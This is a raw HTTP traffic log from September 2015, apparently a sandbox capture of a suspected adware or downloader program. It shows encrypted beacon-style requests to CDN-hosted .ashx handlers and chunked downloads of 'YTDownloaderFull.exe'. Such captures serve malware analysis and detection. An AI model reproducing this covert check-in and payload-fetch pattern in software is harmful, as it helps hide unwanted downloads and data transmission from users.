GET /14314.ashx?e=/TVH52TeC6QinMwQKODRlGRUqvu659HFIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGDDbltvqAzQCw6kHnR XV4QBZGQjpShx/0JQd5HxgIXcFljvsbds7FP1MD0RZMJTghpRaG5UbXNBLHocoDBHKKK/1bjUefs49JU1ySiay1sqdymVuPyjsZ40oQa07NiSGHSvtnkZb9H9Fc ZH5YnXW9iHRMVKaBRE8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWMc5pB8b49iEV3IK/IMAo6EcW/Ds9zcpL4qcbOV8TZlZQ== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:51 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS



GET /14314.ashx?e=hNMAVKhukrzd/jwMCMorqnRyfx22RDGQs1FW/TpGzIP UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiGGOhdsvITwVAbULHJpnG/4XOg23g5 yPOzV4mKJhjCiOBvq/txek z4HsrR8MHCWlUGZM/ipg 4PIAIQtwrEX1/kTVIpb8Jsqp9Xc7DttahTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRp7 srzHUOTm5Cd3FHp 6lvDMpb3phhqpJJEKkB5GbhZH HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:53 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS



GET /14314.ashx?e=c2mW1WEUbCFmS6nlSU/NTmTSvfLK6KnR/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/U7MEatNnCEgXCfGg4gcTppNB3Tmp8 xhs IILilpWF0OiEhuPxDpVu4qmcipTkY2jZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HdZh88XBqEFw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:53 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS


GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=250000-499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: otr4vhc-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 10 Sep 2015 07:25:42 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv
x-amz-request-id: A7561DB98695E903
Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT
ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 250000-499999/5107690

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=750000-999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: otr4vhc-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 10 Sep 2015 07:25:42 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv
x-amz-request-id: A7561DB98695E903
Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT
ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 750000-999999/5107690

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=1250000-1499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: otr4vhc-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 10 Sep 2015 07:25:42 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv
x-amz-request-id: A7561DB98695E903
Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT
ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 1250000-1499999/5107690

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=1750000-1999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: otr4vhc-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 10 Sep 2015 07:25:42 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv
x-amz-request-id: A7561DB98695E903
Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT
ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 1750000-1999999/5107690

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=2250000-2499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: otr4vhc-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 10 Sep 2015 07:25:42 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv
x-amz-request-id: A7561DB98695E903
Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT
ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 2250000-2499999/5107690

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=2750000-2999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: otr4vhc-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 10 Sep 2015 07:25:43 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv
x-amz-request-id: A7561DB98695E903
Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT
ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 2750000-2999999/5107690

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=3250000-3499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: otr4vhc-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 10 Sep 2015 07:25:43 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv
x-amz-request-id: A7561DB98695E903
Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT
ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 3250000-3499999/5107690

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=3750000-3999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: otr4vhc-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 10 Sep 2015 07:25:43 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv
x-amz-request-id: A7561DB98695E903
Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT
ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 3750000-3999999/5107690

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=4250000-4499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: otr4vhc-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 10 Sep 2015 07:25:43 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv
x-amz-request-id: A7561DB98695E903
Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT
ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 4250000-4499999/5107690

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=4750000-4999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: otr4vhc-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 10 Sep 2015 07:25:43 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv
x-amz-request-id: A7561DB98695E903
Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT
ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 4750000-4999999/5107690

<<< skipped >>>

GET /p.ashx?e=hXeqmv1IpelezyBKiN6u N1vyTAtA4H6YDEAjQn1Lmtt1izXJZF/6vvyuZBJPUqNl5HByWpqmAJFOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzjzLYAxbXqOnWZKpgXCSq4SDnn5VSfoN/21 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFDMWtlnh6ykcF31vgH 2Mri4btG OZIk/2mmPmExLeVKUfdGpw3nUgo1AB0/J1xV VzROXqj/RlgPr3Ugg3/8WtyvhlGeipNVNIPaRbv9tSE6xlJd0h7/gbpA3OICltclTTHWShtgC3tHeY4VvF6cr5U0 aUQ/m crqPmttmFAsg= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net


HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 10 Sep 2015 07:25:40 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: l62kUjuIPVNx7G1FsC4ppFRMgM_RrMyJBM7930TqG2jwBeFcaaQRig==



GET /p.ashx?e=AmLJM6c3sNcinMwQKODRlH//a oiiAE7afZ 1lgBdJh98I3OtgNDmPNwq/ptTPwxG04r2GZQbxA4k4Gm5vvSsqPDNr67XZXHtFkoiderqV1YdEo/sIoh/7X9xJ7cHCGG3Wov6VrYoypQSW6B2fRivsTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn51tQUcd/Mb9Q48VIs1kHEk9UB7N1/dopRDky3Dqn1Tl0phfdOL Ldgzss114wpp3H HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net


HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 10 Sep 2015 07:25:40 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: zPfg3FQwUURmkkXphZQ8DiDupSGqVCsuvI0ijQ7v5Qt0e3W3-ml86Q==



GET /p.ashx?e=j7YMo/n29XPJd3Cl8WpRrjRFyso9cgVYCqZ8E6fZMGYegceCn LKWe/lQO2eO0N8r J80GV4qARlUrzhzYzRp7 srzHUOTm5Cd3FHp 6lvDMpb3phhqpJJQzpy6nz8DG6TnR9dT7ayg3fHrFM BTebXDbzJkSidOU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOT021585MfhSn4/c5CbCMCXDyhRDL0PLamQc6wesLGsUQTxIUcsgQ w4nb2Tq9zCss8dzLecdpLzg== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net


HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 10 Sep 2015 07:25:41 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: rsaUVZaJw4_skUSuwsfw2kDFJNoEtIHY1DDcc8sBPD_oRmGJNacU8w==



GET /p.ashx?e=hWfaA75NtHH85nz5m58wW3Ryfx22RDGQQn7xBp tRz8r4Spdf2ZexFyzOKLYTqXCsGG6qLQR8LceI9VTThLJ3QUOVwUN6qMm8gbXZsuvvibpKDN532NTcQ01xTGsf88 UxX212nyBDCa/en1gDcOKJEEbwQeHz5MQI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiZ26V9rLf5AefUXC4FfWEqIYCpHZc9ZUaF11Cw3 PgSWkz214Ep0g7IOZQPJMLBJ9NumKmesFqXQXZNzCg/DopP HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net


HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 10 Sep 2015 07:25:41 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: WHq4Jy6YNRqMj_JfJBuSA1Bt9FXVKMWT3GE3j9fTPtLVD4LOcYnqOg==



GET /p.ashx?e=1ZEnpGuz/IRMWLJLfNOM3nRyfx22RDGQ 3BljJYGbcAr4Spdf2ZexFyzOKLYTqXCsGG6qLQR8LceI9VTThLJ3QUOVwUN6qMm8gbXZsuvvibpKDN532NTcQ01xTGsf88 UxX212nyBDCa/en1gDcOKJEEbwQeHz5MQI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiZ26V9rLf5AeeOz7ih67i0zYCpHZc9ZUaHn8nmukLEERo4G r 3F6T7f9F3I6C91SWT/e9lpr/riA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net


HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 10 Sep 2015 07:25:41 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: ORqCn1r7rVwHYLmImI3rYHBGKpKqyy5LVnZm-jz66VlcbYWvBFU6Tw==


GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWAeEuJy eF9fKYX3Ti/i3YOG9SIsJmG3UfDVXG8fnVsUkXiRAgddMCaMVoLWI3pNMYIaukc1i7BWldmt6Vgk8tSuaFT9xqmWN6c2C4KGeMVjHOaQfG PYhFdyCvyDAKOhHFvw7Pc3KS KnGzlfE2ZWU= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:38 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS



GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWPa HuGTRyAEFAL52sIXt4Ua8Zp/ 13YC175vqqyfEnMnylXnslTRg848241y0s0/3gUxyF5wkLuxNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsqPDNr67XZXHtFkoiderqV1 3McsuF4cIQ== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:38 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS



GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWLqfIekNLhs5jgb6v7cXpPu93RkgrfPIdK/1bjUefs49JU1ySiay1sqdymVuPyjsZySWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkYqi3Apbk6qiCP3BdDD5/c0cA0ak5bBzFhOSDd4/R9r/g== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:38 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS



GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWJR0WuEl7dbF0kOkPP/ lcpu8eAfWsOK5ZLOhm7KiO348MKRqZY TBH6dnj3H5nABo2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1U0g9pFu/21ITrGUl3SHv B3WYfPFwahBc= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:38 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS



GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWEmvGwE2ItoihD9gPpiV Hiz4gguKWlYXXFG19d2lv/HJ3iKHvUBVBgUcVzVK9Vv1jMSmYkL7hHK6EQb8iyo3pEeI9VTThLJ3QUOVwUN6qMm8gbXZsuvvibpKDN532NTcfyawYzTk7BWxNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsqPDNr67XZXHtFkoiderqV1 3McsuF4cIQ== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:39 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS



GET /14314.ashx?e=PcwT4QFtuPDEA05CBT6a0a4CrgF/oVkXhiJeNe9dCpGmy6t0 u4xzf2TEkHeJNDU8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/Lhu0b45kiT/XpciovEgse2DHUe356ADpreizXIw2lEUbPLm xNo0/Q2TwyUgITHw7M71aw1jTiyjv1xK4cZYkyPbkKqymX8SAU 363aeyXs1AoyOtVJIk2k Fnd7x9HpjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsMss0xdmNFlbg== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:39 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=lOCrbsNL2zUH/Xh5Gdj8QRto1MEeYN4JnvZi s3jtzHZ5YIGg5oNPurVyaMS1AoBVcsZgjOTLBig1VAsf0FmYhhjoXbLyE8Fd/XCztdoPbJFiFlIaXxqEcmxw368usKjODQ8kqa2OFucrnwHv6 D0kjg8U5er5Kbb8P2ueh3oC2Lhrdc92pjLAMCH7VE 0 bpzYLgoZ4xWMc5pB8b49iEV3IK/IMAo6EcW/Ds9zcpL79A76Wdf5bQVO8xmMRVWZOb7j5JAyiJ5DwvGnwcuiCjBHn3WtPO7Tk HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:39 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWJKvgNPDm5dkjgb6v7cXpPth71QQSR2eRlO8xmMRVWZOb7j5JAyiJ5DwvGnwcuiCjBHn3WtPO7TkPk55LBQN29raE2JuypHmFWVSvOHNjNGnv6yvMdQ5ObkJ3cUen7qW8MylvemGGqkkkQqQHkZuFkc= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:39 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=Qoli4LW15gtmS6nlSU/NTiWcJxQhCNYt/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/Lhu0b45kiT8IWTdc0BVRzshiWv5Ja8Fbs IILilpWF2W4ZI0w3yOP6AmNqIc/gweVlbgaese6RhKA1//X/jiUoeaRpMgDk3ufIzQ IK/nbD0C88izLTrg/fFTbMNbJ5taoe2/agTRYgklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGKotwKW5Oqogj9wXQw f3NHANGpOWwcxYTkg3eP0fa/4= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:39 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=/9ZmISdorEsAVnWQbAnLWDRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWL6tRdMI7h/vKYX3Ti/i3YPWPRIVASL5KT5tnTkM 7F4BaFpu1lQbV/yfwmWa4R8zkCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndBQ5XBQ3qoybyBtdmy6 JukoM3nfY1NxsN F7xXEI/M= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:40 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=/9ZmISdorEsAVnWQbAnLWDRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWAo1JeSgT 5XmlmKz1/6dN0DuwyzS1Mqn4ls6uYy0joALkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBwLgrSkZSFaNnd/rihenux9DwqPoy7y/e9FgAYD7IlOOSp LYLDcsF6Odloy4EgwsaMMPQ SS4HkA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:40 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
